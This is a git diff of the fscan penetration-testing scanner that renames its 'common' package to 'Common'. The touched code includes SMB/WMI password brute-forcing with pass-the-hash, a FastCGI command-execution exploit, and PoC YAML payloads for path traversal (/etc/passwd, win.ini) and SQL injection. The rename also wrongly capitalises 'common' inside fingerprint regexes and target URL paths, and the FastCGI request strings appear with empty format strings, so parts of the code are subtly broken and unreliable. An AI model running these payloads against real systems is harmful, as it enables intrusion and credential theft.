+ executeScanTasks(info, Common.Scantype, &ch, &wg)
}
}
// URL扫描
- for _, url := range common.Urls {
+ for _, url := range Common.Urls {
info.Url = url
AddScan("web", info, &ch, &wg)
}
// 等待所有任务完成
wg.Wait()
- common.LogWG.Wait()
- close(common.Results)
- fmt.Printf("[✓] 扫描已完成: %v/%v\n", common.End, common.Num)
+ Common.LogWG.Wait()
+ close(Common.Results)
+ fmt.Printf("[✓] 扫描已完成: %v/%v\n", Common.End, Common.Num)
}
// executeScanStrategy 执行端口扫描策略
func executeScanStrategy(Hosts []string, scanType string) []string {
switch scanType {
case "webonly", "webpoc":
- return NoPortScan(Hosts, common.Ports)
+ return NoPortScan(Hosts, Common.Ports)
case "hostname":
- common.Ports = "139"
- return NoPortScan(Hosts, common.Ports)
+ Common.Ports = "139"
+ return NoPortScan(Hosts, Common.Ports)
default:
if len(Hosts) > 0 {
- ports := PortScan(Hosts, common.Ports, common.Timeout)
+ ports := PortScan(Hosts, Common.Ports, Common.Timeout)
fmt.Printf("[+] 存活端口数量: %d\n", len(ports))
if scanType == "portscan" {
- common.LogWG.Wait()
+ Common.LogWG.Wait()
return nil
}
return ports
@@ -116,7 +116,7 @@ func executeScanTasks(info Config.HostInfo, scanType string, ch *chan struct{},
switch info.Ports {
case "135":
AddScan("findnet", info, ch, wg)
- if common.IsWmi {
+ if Common.IsWmi {
AddScan("wmiexec", info, ch, wg)
}
case "445":
@@ -160,7 +160,7 @@ func AddScan(scantype string, info Config.HostInfo, ch *chan struct{}, wg *sync.
// 增加总任务数
Mutex.Lock()
- common.Num += 1
+ Common.Num += 1
Mutex.Unlock()
// 执行扫描
@@ -168,7 +168,7 @@ func AddScan(scantype string, info Config.HostInfo, ch *chan struct{}, wg *sync.
// 增加已完成任务数
Mutex.Lock()
- common.End += 1
+ Common.End += 1
Mutex.Unlock()
}()
}
diff --git a/Plugins/wmiexec.go b/Plugins/WMIExec.go
similarity index 75%
rename from Plugins/wmiexec.go
rename to Plugins/WMIExec.go
index bd230e2..5337f03 100644
--- a/Plugins/wmiexec.go
+++ b/Plugins/WMIExec.go
@@ -3,8 +3,8 @@ package Plugins
import (
"errors"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"os"
"strings"
"time"
@@ -28,42 +28,42 @@ func init() {
}
func WmiExec(info *Config.HostInfo) (tmperr error) {
- if common.IsBrute {
+ if Common.IsBrute {
return nil
}
starttime := time.Now().Unix()
- for _, user := range common.Userdict["smb"] {
+ for _, user := range Common.Userdict["smb"] {
PASS:
- for _, pass := range common.Passwords {
+ for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
- flag, err := Wmiexec(info, user, pass, common.Hash)
+ flag, err := Wmiexec(info, user, pass, Common.Hash)
errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err)
errlog = strings.Replace(errlog, "\n", "", -1)
- common.LogError(errlog)
+ Common.LogError(errlog)
if flag == true {
var result string
- if common.Domain != "" {
- result = fmt.Sprintf("[+] WmiExec %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
+ if Common.Domain != "" {
+ result = fmt.Sprintf("[+] WmiExec %v:%v:%v\\%v ", info.Host, info.Ports, Common.Domain, user)
} else {
result = fmt.Sprintf("[+] WmiExec %v:%v:%v ", info.Host, info.Ports, user)
}
- if common.Hash != "" {
- result += "hash: " + common.Hash
+ if Common.Hash != "" {
+ result += "hash: " + Common.Hash
} else {
result += pass
}
- common.LogSuccess(result)
+ Common.LogSuccess(result)
return err
} else {
tmperr = err
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
- if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
+ if time.Now().Unix()-starttime > (int64(len(Common.Userdict["smb"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
- if len(common.Hash) == 32 {
+ if len(Common.Hash) == 32 {
break PASS
}
}
@@ -73,8 +73,8 @@ func WmiExec(info *Config.HostInfo) (tmperr error) {
func Wmiexec(info *Config.HostInfo, user string, pass string, hash string) (flag bool, err error) {
target := fmt.Sprintf("%s:%v", info.Host, info.Ports)
- wmiexec.Timeout = int(common.Timeout)
- return WMIExec(target, user, pass, hash, common.Domain, common.Command, ClientHost, "", nil)
+ wmiexec.Timeout = int(Common.Timeout)
+ return WMIExec(target, user, pass, hash, Common.Domain, Common.Command, ClientHost, "", nil)
}
func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) {
diff --git a/Plugins/webtitle.go b/Plugins/WebTitle.go
similarity index 90%
rename from Plugins/webtitle.go
rename to Plugins/WebTitle.go
index d04bc84..ccc4e98 100644
--- a/Plugins/webtitle.go
+++ b/Plugins/WebTitle.go
@@ -13,14 +13,14 @@ import (
"time"
"unicode/utf8"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/WebScan"
"github.com/shadow1ng/fscan/WebScan/lib"
- "github.com/shadow1ng/fscan/common"
"golang.org/x/text/encoding/simplifiedchinese"
)
func WebTitle(info *Config.HostInfo) error {
- if common.Scantype == "webpoc" {
+ if Common.Scantype == "webpoc" {
WebScan.WebScan(info)
return nil
}
@@ -32,11 +32,11 @@ func WebTitle(info *Config.HostInfo) error {
return nil
}
}
- if !common.NoPoc && err == nil {
+ if !Common.NoPoc && err == nil {
WebScan.WebScan(info)
} else {
errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
}
return err
}
@@ -49,13 +49,13 @@ func GOWebTitle(info *Config.HostInfo) (err error, CheckData []WebScan.CheckData
info.Url = fmt.Sprintf("https://%s", info.Host)
default:
host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
- protocol := GetProtocol(host, common.Timeout)
+ protocol := GetProtocol(host, Common.Timeout)
info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
}
} else {
if !strings.Contains(info.Url, "://") {
host := strings.Split(info.Url, "/")[0]
- protocol := GetProtocol(host, common.Timeout)
+ protocol := GetProtocol(host, Common.Timeout)
info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
}
}
@@ -113,14 +113,14 @@ func geturl(info *Config.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
if err != nil {
return err, "", CheckData
}
- req.Header.Set("User-agent", common.UserAgent)
- req.Header.Set("Accept", common.Accept)
+ req.Header.Set("User-agent", Common.UserAgent)
+ req.Header.Set("Accept", Common.Accept)
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
- if common.Cookie != "" {
- req.Header.Set("Cookie", common.Cookie)
+ if Common.Cookie != "" {
+ req.Header.Set("Cookie", Common.Cookie)
}
- //if common.Pocinfo.Cookie != "" {
- // req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
+ //if Common.Pocinfo.Cookie != "" {
+ // req.Header.Set("Cookie", "rememberMe=1;"+Common.Pocinfo.Cookie)
//} else {
// req.Header.Set("Cookie", "rememberMe=1")
//}
@@ -162,7 +162,7 @@ func geturl(info *Config.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
if reurl != "" {
result += fmt.Sprintf(" 跳转url: %s", reurl)
}
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
if reurl != "" {
return nil, reurl, CheckData
@@ -233,7 +233,7 @@ func GetProtocol(host string, Timeout int64) (protocol string) {
return
}
- socksconn, err := common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second)
+ socksconn, err := Common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second)
if err != nil {
return
}
@@ -242,7 +242,7 @@ func GetProtocol(host string, Timeout int64) (protocol string) {
if conn != nil {
defer func() {
if err := recover(); err != nil {
- common.LogError(err)
+ Common.LogError(err)
}
}()
conn.Close()
diff --git a/Plugins/fcgiscan.go b/Plugins/fcgiscan.go
index a14776c..ba7b696 100644
--- a/Plugins/fcgiscan.go
+++ b/Plugins/fcgiscan.go
@@ -6,8 +6,8 @@ import (
"encoding/binary"
"errors"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"io"
"strconv"
"strings"
@@ -22,14 +22,14 @@ import (
// FcgiScan 执行FastCGI服务器漏洞扫描
func FcgiScan(info *Config.HostInfo) error {
// 如果设置了暴力破解模式则跳过
- if common.IsBrute {
+ if Common.IsBrute {
return nil
}
// 设置目标URL路径
url := "/etc/issue"
- if common.Path != "" {
- url = common.Path
+ if Common.Path != "" {
+ url = Common.Path
}
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
@@ -38,10 +38,10 @@ func FcgiScan(info *Config.HostInfo) error {
var cutLine = "-----ASDGTasdkk361363s-----\n" // 用于分割命令输出的标记
switch {
- case common.Command == "read":
+ case Common.Command == "read":
reqParams = "" // 读取模式
- case common.Command != "":
- reqParams = fmt.Sprintf("", common.Command, cutLine) // 自定义命令
+ case Common.Command != "":
+ reqParams = fmt.Sprintf("", Common.Command, cutLine) // 自定义命令
default:
reqParams = fmt.Sprintf("", cutLine) // 默认执行whoami
}
@@ -65,7 +65,7 @@ func FcgiScan(info *Config.HostInfo) error {
}
// 建立FastCGI连接
- fcgi, err := New(addr, common.Timeout)
+ fcgi, err := New(addr, Common.Timeout)
defer func() {
if fcgi.rwc != nil {
fcgi.rwc.Close()
@@ -97,7 +97,7 @@ func FcgiScan(info *Config.HostInfo) error {
result = fmt.Sprintf("[+] FastCGI漏洞确认 %v:%v\n命令输出:\n%v",
info.Host, info.Ports, output)
}
- common.LogSuccess(result)
+ Common.LogSuccess(result)
} else if strings.Contains(output, "File not found") ||
strings.Contains(output, "Content-type") ||
strings.Contains(output, "Status") {
@@ -109,7 +109,7 @@ func FcgiScan(info *Config.HostInfo) error {
result = fmt.Sprintf("[*] FastCGI服务确认 %v:%v\n响应:\n%v",
info.Host, info.Ports, output)
}
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
return nil
@@ -187,7 +187,7 @@ type FCGIClient struct {
}
func New(addr string, timeout int64) (fcgi *FCGIClient, err error) {
- conn, err := common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second)
+ conn, err := Common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second)
fcgi = &FCGIClient{
rwc: conn,
keepAlive: false,
diff --git a/WebScan/InfoScan.go b/WebScan/InfoScan.go
index 5dcc449..0a6dc18 100644
--- a/WebScan/InfoScan.go
+++ b/WebScan/InfoScan.go
@@ -3,8 +3,8 @@ package WebScan
import (
"crypto/md5"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/WebScan/info"
- "github.com/shadow1ng/fscan/common"
"regexp"
)
@@ -39,7 +39,7 @@ func InfoCheck(Url string, CheckData *[]CheckDatas) []string {
if len(infoname) > 0 {
result := fmt.Sprintf("[+] InfoScan %-25v %s ", Url, infoname)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
return infoname
}
return []string{""}
diff --git a/WebScan/WebScan.go b/WebScan/WebScan.go
index a2e3ca3..15025bb 100644
--- a/WebScan/WebScan.go
+++ b/WebScan/WebScan.go
@@ -3,9 +3,9 @@ package WebScan
import (
"embed"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/WebScan/lib"
- "github.com/shadow1ng/fscan/common"
"net/http"
"os"
"path/filepath"
@@ -20,7 +20,7 @@ var AllPocs []*lib.Poc
func WebScan(info *Config.HostInfo) {
once.Do(initpoc)
- var pocinfo = common.Pocinfo
+ var pocinfo = Common.Pocinfo
buf := strings.Split(info.Url, "/")
pocinfo.Target = strings.Join(buf[:3], "/")
@@ -34,25 +34,25 @@ func WebScan(info *Config.HostInfo) {
}
}
-func Execute(PocInfo common.PocInfo) {
+func Execute(PocInfo Common.PocInfo) {
req, err := http.NewRequest("GET", PocInfo.Target, nil)
if err != nil {
errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
return
}
- req.Header.Set("User-agent", common.UserAgent)
- req.Header.Set("Accept", common.Accept)
+ req.Header.Set("User-agent", Common.UserAgent)
+ req.Header.Set("Accept", Common.Accept)
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
- if common.Cookie != "" {
- req.Header.Set("Cookie", common.Cookie)
+ if Common.Cookie != "" {
+ req.Header.Set("Cookie", Common.Cookie)
}
pocs := filterPoc(PocInfo.PocName)
- lib.CheckMultiPoc(req, pocs, common.PocNum)
+ lib.CheckMultiPoc(req, pocs, Common.PocNum)
}
func initpoc() {
- if common.PocPath == "" {
+ if Common.PocPath == "" {
entries, err := Pocs.ReadDir("pocs")
if err != nil {
fmt.Printf("[-] init poc error: %v", err)
@@ -67,8 +67,8 @@ func initpoc() {
}
}
} else {
- fmt.Println("[+] load poc from " + common.PocPath)
- err := filepath.Walk(common.PocPath,
+ fmt.Println("[+] load poc from " + Common.PocPath)
+ err := filepath.Walk(Common.PocPath,
func(path string, info os.FileInfo, err error) error {
if err != nil || info == nil {
return err
diff --git a/WebScan/info/rules.go b/WebScan/info/Rules.go
similarity index 98%
rename from WebScan/info/rules.go
rename to WebScan/info/Rules.go
index e7184db..d4d1dd5 100644
--- a/WebScan/info/rules.go
+++ b/WebScan/info/Rules.go
@@ -72,7 +72,7 @@ var RuleDatas = []RuleData{
{"atmail-WebMail", "cookie", "(atmail6)"},
{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"},
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|Hypertext Transfer Protocol -- HTTP/1.1)"},
- {"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
+ {"致远OA", "code", "(/seeyon/Common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
{"discuz", "code", "(content=\"Discuz! X\")"},
{"Typecho", "code", "(Typecho)"},
{"金蝶EAS", "code", "(easSessionId)"},
@@ -88,10 +88,10 @@ var RuleDatas = []RuleData{
{"CISCO_EPC3925", "code", "(Docsis_system)"},
{"CISCO ASR", "code", "(CISCO ASR)"},
{"H3C ER3200", "code", "(ER3200系统管理)"},
- {"万户oa", "code", "(/defaultroot/templates/template_system/common/css/|/defaultroot/scripts/|css/css_whir.css)"},
+ {"万户oa", "code", "(/defaultroot/templates/template_system/Common/css/|/defaultroot/scripts/|css/css_whir.css)"},
{"Spark_Master", "code", "(Spark Master at)"},
{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
- {"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"},
+ {"蓝凌OA", "code", "(/scripts/jquery.landray.Common.js)"},
{"深信服ssl-vpn", "code", "(login_psw.csp)"},
{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
@@ -229,14 +229,14 @@ var RuleDatas = []RuleData{
{"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
{"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
{"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
- {"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/common)"},
+ {"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/Common)"},
{"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"},
{"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
{"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|Hypertext Transfer Protocol -- HTTP/1.1|Error 404--Not Found|Welcome to Weblogic Application Server|Oracle WebLogic Server 管理控制台)"},
{"weblogic", "headers", "(WebLogic)"},
- {"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/common/)"},
- {"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+ {"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/Common/)"},
+ {"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.Common.js)"},
{"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"},
{"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"},
{"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"},
@@ -246,7 +246,7 @@ var RuleDatas = []RuleData{
{"用友NC", "code", "(Yonyou UAP|YONYOU NC|/Client/Uclient/UClient.dmg|logo/images/ufida_nc.png|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
{"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
- {"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
+ {"JEECMS", "code", "(/r/cms/www/red/js/Common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
{"CMS", "code", "(Powered by .*CMS)"},
{"目录遍历", "code", "(Directory listing for /)"},
{"ATLASSIAN-Confluence", "code", "(com.atlassian.confluence)"},
diff --git a/WebScan/lib/check.go b/WebScan/lib/Check.go
similarity index 97%
rename from WebScan/lib/check.go
rename to WebScan/lib/Check.go
index 7dec98d..be706a4 100644
--- a/WebScan/lib/check.go
+++ b/WebScan/lib/Check.go
@@ -4,8 +4,8 @@ import (
"crypto/md5"
"fmt"
"github.com/google/cel-go/cel"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/WebScan/info"
- "github.com/shadow1ng/fscan/common"
"math/rand"
"net/http"
"net/url"
@@ -34,7 +34,7 @@ func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) {
isVul, _, name := executePoc(task.Req, task.Poc)
if isVul {
result := fmt.Sprintf("[+] PocScan %s %s %s", task.Req.URL, task.Poc.Name, name)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
wg.Done()
}
@@ -82,7 +82,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
for _, item := range p.Set {
k, expression := item.Key, item.Value
if expression == "newReverse()" {
- if !common.DnsLog {
+ if !Common.DnsLog {
return false, nil, ""
}
variableMap[k] = newReverse()
@@ -240,7 +240,7 @@ func optimizeCookies(rawCookie string) (output string) {
}
func newReverse() *Reverse {
- if !common.DnsLog {
+ if !Common.DnsLog {
return &Reverse{}
}
letters := "1234567890abcdefghijklmnopqrstuvwxyz"
@@ -280,7 +280,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
look:
for j, item := range setsMap {
//shiro默认只跑10key
- if p.Name == "poc-yaml-shiro-key" && !common.PocFull && j >= 10 {
+ if p.Name == "poc-yaml-shiro-key" && !Common.PocFull && j >= 10 {
if item[1] == "cbc" {
continue
} else {
@@ -356,15 +356,15 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
if success {
if rule.Continue {
if p.Name == "poc-yaml-backup-file" || p.Name == "poc-yaml-sql-file" {
- common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
+ Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
} else {
- common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
+ Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
}
continue
}
strMap = append(strMap, tmpMap...)
if i == len(p.Rules)-1 {
- common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
+ Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
//防止后续继续打印poc成功信息
return false, nil
}
diff --git a/WebScan/lib/client.go b/WebScan/lib/Client.go
similarity index 94%
rename from WebScan/lib/client.go
rename to WebScan/lib/Client.go
index cbc5754..66b48ad 100644
--- a/WebScan/lib/client.go
+++ b/WebScan/lib/Client.go
@@ -6,7 +6,7 @@ import (
"embed"
"errors"
"fmt"
- "github.com/shadow1ng/fscan/common"
+ "github.com/shadow1ng/fscan/Common"
"golang.org/x/net/proxy"
"gopkg.in/yaml.v2"
"net"
@@ -25,14 +25,14 @@ var (
)
func Inithttp() {
- //common.Proxy = "http://127.0.0.1:8080"
- if common.PocNum == 0 {
- common.PocNum = 20
+ //Common.Proxy = "http://127.0.0.1:8080"
+ if Common.PocNum == 0 {
+ Common.PocNum = 20
}
- if common.WebTimeout == 0 {
- common.WebTimeout = 5
+ if Common.WebTimeout == 0 {
+ Common.WebTimeout = 5
}
- err := InitHttpClient(common.PocNum, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
+ err := InitHttpClient(Common.PocNum, Common.Proxy, time.Duration(Common.WebTimeout)*time.Second)
if err != nil {
panic(err)
}
@@ -56,8 +56,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
DisableKeepAlives: false,
}
- if common.Socks5Proxy != "" {
- dialSocksProxy, err := common.Socks5Dailer(dialer)
+ if Common.Socks5Proxy != "" {
+ dialSocksProxy, err := Common.Socks5Dailer(dialer)
if err != nil {
return err
}
diff --git a/WebScan/lib/eval.go b/WebScan/lib/Eval.go
similarity index 99%
rename from WebScan/lib/eval.go
rename to WebScan/lib/Eval.go
index 0f652e1..0143277 100644
--- a/WebScan/lib/eval.go
+++ b/WebScan/lib/Eval.go
@@ -12,7 +12,7 @@ import (
"github.com/google/cel-go/common/types"
"github.com/google/cel-go/common/types/ref"
"github.com/google/cel-go/interpreter/functions"
- "github.com/shadow1ng/fscan/common"
+ "github.com/shadow1ng/fscan/Common"
exprpb "google.golang.org/genproto/googleapis/api/expr/v1alpha1"
"io"
"math/rand"
@@ -563,7 +563,7 @@ func randomString(n int) string {
}
func reverseCheck(r *Reverse, timeout int64) bool {
- if ceyeApi == "" || r.Domain == "" || !common.DnsLog {
+ if ceyeApi == "" || r.Domain == "" || !Common.DnsLog {
return false
}
time.Sleep(time.Second * time.Duration(timeout))
@@ -627,7 +627,7 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
defer oResp.Body.Close()
resp, err := ParseResponse(oResp)
if err != nil {
- common.LogError("[-] ParseResponse error: " + err.Error())
+ Common.LogError("[-] ParseResponse error: " + err.Error())
//return nil, err
}
return resp, err
diff --git a/WebScan/lib/shiro.go b/WebScan/lib/Shiro.go
similarity index 100%
rename from WebScan/lib/shiro.go
rename to WebScan/lib/Shiro.go
diff --git a/WebScan/pocs/ruoyi-management-fileread.yml b/WebScan/pocs/ruoyi-management-fileread.yml
index 6debdd1..547f5b8 100644
--- a/WebScan/pocs/ruoyi-management-fileread.yml
+++ b/WebScan/pocs/ruoyi-management-fileread.yml
@@ -2,12 +2,12 @@ name: poc-yaml-ruoyi-management-fileread
groups:
linux:
- method: GET
- path: /common/download/resource?resource=/profile/../../../../etc/passwd
+ path: /Common/download/resource?resource=/profile/../../../../etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
windows:
- method: GET
- path: /common/download/resource?resource=/profile/../../../../Windows/win.ini
+ path: /Common/download/resource?resource=/profile/../../../../Windows/win.ini
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
diff --git a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml b/WebScan/pocs/seeyon-a6-test-jsp-sql.yml
index c104494..a5e467a 100644
--- a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml
+++ b/WebScan/pocs/seeyon-a6-test-jsp-sql.yml
@@ -3,7 +3,7 @@ set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
- path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
+ path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
expression:
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
diff --git a/WebScan/pocs/yonyou-u8-oa-sqli.yml b/WebScan/pocs/yonyou-u8-oa-sqli.yml
index 9933b52..324cdd3 100644
--- a/WebScan/pocs/yonyou-u8-oa-sqli.yml
+++ b/WebScan/pocs/yonyou-u8-oa-sqli.yml
@@ -3,7 +3,7 @@ set:
rand: randomInt(200000000, 220000000)
rules:
- method: GET
- path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
+ path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
diff --git a/common/config.go b/common/config.go
index 4bc2e69..6dd46ae 100644
--- a/common/config.go
+++ b/common/config.go
@@ -1,4 +1,4 @@
-package common
+package Common
var version = "1.8.4"
var Userdict = map[string][]string{
diff --git a/common/flag.go b/common/flag.go
index 972903d..d941ff0 100644
--- a/common/flag.go
+++ b/common/flag.go
@@ -1,4 +1,4 @@
-package common
+package Common
import (
"flag"
diff --git a/common/log.go b/common/log.go
index 7f48f51..78db646 100644
--- a/common/log.go
+++ b/common/log.go
@@ -1,4 +1,4 @@
-package common
+package Common
import (
"encoding/json"
diff --git a/common/proxy.go b/common/proxy.go
index 780c9d0..69a27e5 100644
--- a/common/proxy.go
+++ b/common/proxy.go
@@ -1,4 +1,4 @@
-package common
+package Common
import (
"errors"
diff --git a/main.go b/main.go
index 680866d..b4bc409 100644
--- a/main.go
+++ b/main.go
@@ -2,17 +2,17 @@ package main
import (
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/Plugins"
- "github.com/shadow1ng/fscan/common"
"time"
)
func main() {
start := time.Now()
var Info Config.HostInfo
- common.Flag(&Info)
- common.Parse(&Info)
+ Common.Flag(&Info)
+ Common.Parse(&Info)
Plugins.Scan(Info)
fmt.Printf("[*] 扫描结束,耗时: %s\n", time.Since(start))
}